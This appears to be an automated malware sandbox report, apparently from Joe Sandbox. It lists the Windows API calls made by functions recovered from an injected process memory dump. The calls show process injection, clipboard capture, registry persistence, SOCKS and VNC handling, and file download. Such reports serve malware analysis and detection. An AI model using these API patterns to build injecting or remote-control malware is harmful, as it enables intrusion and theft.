Part of subcall function 001B0AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0CB5

Part of subcall function 001B9B3E: CreateMutexW.KERNEL32(001C2C30,00000000,001C3F40,?,?,?,001A79E5), ref: 001B9B66

Strings

, xrefs: 001B1301

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BD325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 001B2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 001BD34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 001BD35D

Part of subcall function 001BC86B: SetEvent.KERNEL32(001BD36D,00000000), ref: 001BC871
Part of subcall function 001BC86B: WaitForSingleObject.KERNEL32(00000090,000000FF), ref: 001BC884

Part of subcall function 001ABCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 001ABCEC
Part of subcall function 001ABCAF: Sleep.KERNEL32(000001F4), ref: 001ABCFB
Part of subcall function 001ABCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 001ABD11

Part of subcall function 001B8A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 001B8A5A
Part of subcall function 001B8A29: FindNextFileW.KERNEL32(00000000,?), ref: 001B8AB5
Part of subcall function 001B8A29: FindClose.KERNEL32(00000000), ref: 001B8AC0
Part of subcall function 001B8A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 001B8ACC
Part of subcall function 001B8A29: RemoveDirectoryW.KERNEL32(?), ref: 001B8AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 001BD39B
CharToOemW.USER32(?,?), ref: 001BD3B7
CharToOemW.USER32(?,?), ref: 001BD3C6

Part of subcall function 001B40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 001B410D

ExitProcess.KERNEL32(00000000), ref: 001BD41C

Part of subcall function 001B4E7B: CharToOemW.USER32(?,?), ref: 001B4EAB
Part of subcall function 001B4E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 001B4F2F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B51FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001B521D

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 001B524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 001B5267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001B5282
FlushFileBuffers.KERNEL32(00000000), ref: 001B52A2

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

CloseHandle.KERNEL32(00000000), ref: 001B52B5

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 001B7B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 001B7B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 001B7B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001B7B72
GetWindowLongW.USER32(?,000000F0), ref: 001B7B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B7B9D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B85D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 001B85F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 001B8648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8662
CloseHandle.KERNEL32(?), ref: 001B866B

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 001A5B1C

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

TlsGetValue.KERNEL32 ref: 001A5AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 001A5AD4
SaveDC.GDI32(?), ref: 001A5AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 001A5AF4
RestoreDC.GDI32(?,00000000), ref: 001A5B06

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(001B8C87,00000000,00000000,00000001,F0000040,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4679
CryptCreateHash.ADVAPI32(001B8C87,00008003,00000000,00000000,00000030,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4691
CryptHashData.ADVAPI32(00000030,00000010,001B8C87,00000000,?,001B8C87), ref: 001B46AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,001B8C87), ref: 001B46C5
CryptDestroyHash.ADVAPI32(00000030,?,001B8C87), ref: 001B46DC
CryptReleaseContext.ADVAPI32(001B8C87,00000000,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B46E6

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A6010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 001A610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 001A61E6

Part of subcall function 001A70A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 001A70CA
Part of subcall function 001A70A6: GetNativeSystemInfo.KERNEL32(?), ref: 001A70D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 001A6162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 001A61A4

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B34BD: GetSystemTime.KERNEL32(?,?,?,001A60C8,00000000,000000FF,00000000), ref: 001B34C7
Part of subcall function 001B34BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,001A60C8,00000000,000000FF,00000000), ref: 001B34D5

Part of subcall function 001B34E5: GetTimeZoneInformation.KERNEL32(?), ref: 001B34F4

Strings

, xrefs: 001A6218

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A7125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 001A7138

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 001A71C0

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

PathUnquoteSpacesW.SHLWAPI(?), ref: 001A71A0
ExpandEnvironmentStringsW.KERNEL32(?,001BD23A,00000104), ref: 001A71AD

Strings

.exe, xrefs: 001A7147

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 001B4FA6
InternetSetOptionA.WININET(00000000,00000002,001C200C,00000004), ref: 001B4FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B4FE2
InternetCloseHandle.WININET(00000000), ref: 001B4FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 001B4F97, 001B4FA5

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B5403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 001B5414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 001B5427
FreeLibrary.KERNEL32(?), ref: 001B5479

Strings

urlmon.dll, xrefs: 001B540D
ObtainUserAgentString, xrefs: 001B5421

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 001A74BE
lstrcmpiA.KERNEL32(?,vnc), ref: 001A74D1

Part of subcall function 001B7425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B7444
Part of subcall function 001B7425: CloseHandle.KERNEL32(?), ref: 001B7450

Part of subcall function 001B7477: SetLastError.KERNEL32(0000009B,001B2AC8,00000000,001ABB5F,00000000,001C2AF0,00000000,00000104,76C605D7,00000000), ref: 001B7481
Part of subcall function 001B7477: CreateThread.KERNEL32(00000000,001C2AF0,001C2AF0,001C2AF0,00000000,00000000), ref: 001B74A4

Part of subcall function 001B675E: shutdown.WS2_32(?,00000002), ref: 001B6766
Part of subcall function 001B675E: #3.WS2_32(?), ref: 001B676D

Part of subcall function 001B74BC: WaitForMultipleObjects.KERNEL32(?,001C2AEC,00000001,000000FF), ref: 001B74CE

CloseHandle.KERNEL32(?), ref: 001A76EE

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Part of subcall function 001B6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 001B6463
Part of subcall function 001B6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,001A7518,?), ref: 001B64B0

Part of subcall function 001B67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 001B67CC

Part of subcall function 001B6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 001B67A7

Part of subcall function 001B666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 001B66EA
Part of subcall function 001B666B: WSASetLastError.WS2_32(0000274C), ref: 001B66F9

Part of subcall function 001B636E: recv.WS2_32(?,?,00000001,00000000), ref: 001B6392

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

Strings

vnc, xrefs: 001A74CA
socks, xrefs: 001A74B7

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A9D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 001A9E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001A9E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 001A9ED7

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,001B9E26,?,?,?,001B75CD,?,?,00000000,00000004,?), ref: 001B761F
Part of subcall function 001B7607: RegCloseKey.KERNEL32(?,?,001B75CD,?,?,00000000,00000004,?,?,?,?,001B9E26,?,?), ref: 001B762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 001A9F7A
RegCloseKey.ADVAPI32(?), ref: 001A9F8D

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A8E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 001A8E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 001A8F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 001A8F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 001A8F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 001A8F7B

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B9224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 001B9245

Part of subcall function 001B86EF: GetFileSizeEx.KERNEL32(001B925C,001B925C,?,?,?,001B925C,00000000), ref: 001B86FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 001B9286
CloseHandle.KERNEL32(?), ref: 001B9292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 001B9301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 001B9327

Part of subcall function 001B869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 001B86B1

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B9959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetDIBits.GDI32(00000000,001ADE4B,00000000,00000001,00000000,00000000,00000000), ref: 001B9991
GetDIBits.GDI32(00000000,001ADE4B,00000000,00000001,00000000,00000000,00000000), ref: 001B99A7
DeleteObject.GDI32(001ADE4B), ref: 001B99B4
CreateDIBSection.GDI32(00000000,00000000,00000000,001C2888,?,?), ref: 001B9A24

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

DeleteObject.GDI32(001ADE4B), ref: 001B9A43

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BA298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 001BA2A6

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

InternetSetStatusCallbackW.WININET(?,001BA24F), ref: 001BA2DB
InternetReadFileExA.WININET ref: 001BA31B
GetLastError.KERNEL32 ref: 001BA325

Part of subcall function 001B6B28: TranslateMessage.USER32(?), ref: 001B6B4A
Part of subcall function 001B6B28: DispatchMessageW.USER32(?), ref: 001B6B55
Part of subcall function 001B6B28: PeekMessageW.USER32(00000000), ref: 001B6B65
Part of subcall function 001B6B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001B6B79

InternetSetStatusCallbackW.WININET(?,?), ref: 001BA389

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BB3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001BB437
WriteFile.KERNEL32(001BB3D4,?,00000146,?,00000000), ref: 001BB475
WriteFile.KERNEL32(001BB3D4,?,00000000,?,00000000), ref: 001BB499
FlushFileBuffers.KERNEL32(001BB3D4), ref: 001BB4AD
CloseHandle.KERNEL32(001BB3D4), ref: 001BB4B6

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BC49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

GetProcessId.KERNEL32(?), ref: 001BC509

Part of subcall function 001B245B: CreateMutexW.KERNEL32(001C2C30,00000001,?,001C2E70,76C605D7,?,00000002,?,76C605D7), ref: 001B24A3
Part of subcall function 001B245B: GetLastError.KERNEL32 ref: 001B24AF
Part of subcall function 001B245B: CloseHandle.KERNEL32(00000000), ref: 001B24BD

Part of subcall function 001B2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 001B2574
Part of subcall function 001B2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25AB
Part of subcall function 001B2542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25CB
Part of subcall function 001B2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,001B316D,?,00000000), ref: 001B261A

GetThreadContext.KERNEL32 ref: 001BC557
SetThreadContext.KERNEL32(00000000,00000000), ref: 001BC596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 001BC5AD
CloseHandle.KERNEL32(?), ref: 001BC5B7

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 001A5E1A
IntersectRect.USER32(?,?), ref: 001A5E58
IsRectEmpty.USER32(?), ref: 001A5E6A
IntersectRect.USER32(?,?), ref: 001A5E81

Part of subcall function 001A5C8A: GetWindowThreadProcessId.USER32(?,?), ref: 001A5CB4
Part of subcall function 001A5C8A: ResetEvent.KERNEL32(00000010), ref: 001A5D03
Part of subcall function 001A5C8A: PostMessageW.USER32(?,?,?,00000010), ref: 001A5D26
Part of subcall function 001A5C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 001A5D35
Part of subcall function 001A5C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 001A5D60
Part of subcall function 001A5C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 001A5D70
Part of subcall function 001A5C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 001A5D82
Part of subcall function 001A5C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 001A5DA7
Part of subcall function 001A5C8A: IntersectRect.USER32(?,?), ref: 001A5DC7
Part of subcall function 001A5C8A: FillRect.USER32(?,?,00000006), ref: 001A5DD9
Part of subcall function 001A5C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 001A5DED

GetTopWindow.USER32(?), ref: 001A5EB1

Part of subcall function 001B7AC1: GetWindow.USER32(?,00000001), ref: 001B7AE3

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001ABBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 001ABBE0
SetThreadPriority.KERNEL32(00000000), ref: 001ABBE7

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

Part of subcall function 001B2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

PathQuoteSpacesW.SHLWAPI(?), ref: 001ABC2A

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

WaitForSingleObject.KERNEL32(000000C8), ref: 001ABC62

Part of subcall function 001B763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,001B9EAB,?,?,00000004), ref: 001B7658
Part of subcall function 001B763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,001B9EAB,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7672
Part of subcall function 001B763A: RegCloseKey.ADVAPI32(00000004,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 001ABC98

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BB062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 001BB06B

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

GlobalLock.KERNEL32(00000000), ref: 001BB09F
EnterCriticalSection.KERNEL32(001C3FB4,00000000,00000000), ref: 001BB0DF

Part of subcall function 001BAD5F: EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD7C
Part of subcall function 001BAD5F: LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD9D
Part of subcall function 001BAD5F: EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,?,001BB052,?), ref: 001BADAE
Part of subcall function 001BAD5F: LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAE47

LeaveCriticalSection.KERNEL32(001C3FB4,00000000,001A4A68), ref: 001BB0F6

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

GlobalUnlock.KERNEL32(?), ref: 001BB109

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B68E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 001B68F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 001B691C
WSAGetLastError.WS2_32 ref: 001B6923

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B694F

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

#3.WS2_32(?), ref: 001B6963

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B8A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 001B8A5A

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

FindNextFileW.KERNEL32(00000000,?), ref: 001B8AB5
FindClose.KERNEL32(00000000), ref: 001B8AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 001B8ACC
RemoveDirectoryW.KERNEL32(?), ref: 001B8AD3

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 001A5A88

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

TlsGetValue.KERNEL32 ref: 001A5A21
SaveDC.GDI32(?), ref: 001A5A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 001A5A61
RestoreDC.GDI32(?,00000000), ref: 001A5A73

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,001B30F6), ref: 001A5C1C

Part of subcall function 001A54A9: GetWindowInfo.USER32(?,?), ref: 001A5515
